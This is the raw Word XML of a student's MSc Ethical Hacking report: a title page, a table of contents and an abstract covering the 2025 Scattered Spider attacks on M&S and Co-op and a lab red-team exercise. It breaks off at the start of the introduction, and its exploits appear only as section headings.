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80508" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D87BCC9" wp14:editId="324621C2">
            <wp:extent cx="3799205" cy="1943100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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56755" cy="1972534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAA15F" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module: ACCA7033 Ethical Hacking  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DAEEC" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">  MSc Cybersecurity and Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C85C7" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>University of Wales Trinity Saint David</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B4E84D" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Submission Date: 1st May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540B6FB" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>HETVI PATEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB868F6" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>STUDENT ID: 2529465</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FA4E5" w14:textId="77777777" w:rsidR="00277817" w:rsidRPr="00F870C5" w:rsidRDefault="00277817" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABD172" w14:textId="5A09C150" w:rsidR="004B32CC" w:rsidRPr="003064E4" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003064E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F539C" w14:textId="77777777"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Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E75560" w14:textId="77777777"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Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BD5DE" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>TASK 1 — Scattered Spider 2025: A Critical Analysis of the M&amp;S and Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>op Cyber Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01A5ED" w14:textId="2E6FF493"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 xml:space="preserve">Incident Summary and Timeline Analysis </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.1 Narrative Timeline</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.2 Critical Comparative Analysis: M&amp;S vs Co</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70473C21" w14:textId="764D2C54"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 xml:space="preserve">Adversary TTP Mapping — MITRE ATT&amp;CK Framework </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.1 Overview and Analytical Approach</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.2 Attack Flow Diagram</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.3 Critical Evaluation of TTP Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA9F51" w14:textId="1F313871"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 xml:space="preserve">Root Cause Analysis and Security Control Failures </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0016609A" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.1 Technical Failures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.1.1 MFA Implementation Deficiencies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.1.2 Inadequate SIEM and Behavioural Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0016609A" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.2 Organisational and Governance Failures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.2.1 Identity and Access Management (IAM) Deficiencies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.2.2 Absence of Network Micro</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>Segmentation</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.2.3 Human Factors and Security Culture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EE4D5" w14:textId="77777777"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Threat Actor Profile: Scattered Spider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D8357" w14:textId="19C437E4"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 xml:space="preserve">Detection and Response Analysis </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0016609A" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.1 Detection Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0016609A" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.2 Response Effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE470C7" w14:textId="71422EFF"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 xml:space="preserve">Strategic Recommendations </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0016609A" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.1 Critical Reflection on Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C769C5" w14:textId="77777777"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32317E7D" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE45AC" w14:textId="1311EF2A" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17539D2C" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>TASK 2 — Red Team Engagement Report (ABCD Ltd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC1519C" w14:textId="723BC1FE" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Board Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419143AD" w14:textId="798E1ABE" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDE2A45" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Lab Environment and Network Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208A4E1" w14:textId="3CD25122" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 1 — VSFTPD 2.3.4 Backdoor (Metasploitable 2) </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.1 Vulnerability Overview</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.2 Exploitation and Evidence</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.3 MITRE ATT&amp;CK Mapping</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.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA49D8" w14:textId="3EEFD547" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 2 — SMB Credential Attack &amp; PSExec Shell (Windows Server 2019) </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.1 Vulnerability Overview</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.2 Exploitation and Evidence</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.3 MITRE ATT&amp;CK Mapping</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.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDFB1EC" w14:textId="27D62D76" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit 3 — SQL Injection Database Exfiltration (bWAPP) </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.1 Vulnerability Overview</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.2 Exploitation and Evidence</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.3 MITRE ATT&amp;CK Mapping</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.4 Detection Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B96508" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Consolidated MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65A385" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Containment and Safety Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F0752" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0508C51C" w14:textId="77777777" w:rsidR="004B32CC" w:rsidRPr="00F870C5" w:rsidRDefault="004B32CC" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A — Rules of Engagement (RoE) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Appendix B — Figure and Screenshot Index </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:br/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD319F6" w14:textId="736F7D56" w:rsidR="00AE6741" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00AE6741" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697B401" w14:textId="77777777" w:rsidR="00AE6741" w:rsidRPr="00F870C5" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report provides a unified study of modern cyber-attack vectors by integrating a real-world case study of the 2025 Scattered Spider attacks on Marks &amp; Spencer (M&amp;S) and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Co operative</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Group (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Co op</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) with a red team penetration test of a virtualised environment operated by ABCD Ltd. The first section evaluates how Scattered Spider successfully penetrated defences by combining social engineering techniques with MFA fatigue and valid-account abuse; this maps their observed tactics against the MITRE ATT&amp;CK framework, detailing deficiencies in identity security, detection capabilities and governance controls. The second section practically implements the above by exploiting a backdoored FTP service, Windows administrative account weaknesses, and a SQL injection flaw; this demonstrates how both technical misconfigurations and an absence of secure software development practice can be readily exploited. Both sections demonstrate the confluence of human-layer attack techniques with a weak technical posture to enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E17711" w14:textId="6658716F" w:rsidR="00AE6741" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AE6741" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE6741" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A19806" w14:textId="77777777" w:rsidR="00AE6741" w:rsidRDefault="00AE6741" w:rsidP="00AD5488">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The modern security domain is characterized by identity-driven attacks, human-layer exploitation and the deterioration of traditional perimeter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
